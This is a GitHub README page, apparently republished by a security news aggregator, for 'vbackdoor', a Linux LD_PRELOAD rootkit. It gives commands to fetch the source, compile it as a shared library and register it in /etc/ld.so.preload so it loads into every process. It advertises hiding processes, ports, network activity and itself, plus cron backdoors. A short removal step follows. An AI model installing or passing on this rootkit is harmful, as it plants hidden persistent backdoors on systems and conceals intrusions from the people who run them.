vbackdoor
2023-5-10 00:36:51 Author: github.com(查看原文) 阅读量:81 收藏

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

This branch is up to date with veo/vbackdoor:main.

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

中文

Hide process,port,self under Linux using the LD_PRELOAD rootkit.

Compile the library

git clone https://github.com/veo/vbackdoor.git
cd vbackdoor
vi vbackdoor.c
make
sudo mv vbackdoor.so /usr/local/lib/

or

wget https://raw.githubusercontent.com/veo/vbackdoor/main/vbackdoor.c
vi vbackdoor.c
gcc -Wall -fPIC -shared -o vbackdoor.so vbackdoor.c -ldl
sudo mv vbackdoor.so /usr/local/lib/

Load it with the global dynamic linker

echo /usr/local/lib/vbackdoor.so >> /etc/ld.so.preload

Remove

and delete string "/usr/local/lib/vbackdoor.so"

or

use busybox

busybox rm -rf /etc/ld.so.preload
  • Process hiding
  • LD_PRELOAD hiding
  • Network hiding
  • cron Backdoors

文章来源: https://github.com/y35uishere/vbackdoor
如有侵权请联系:admin#unsafe.sh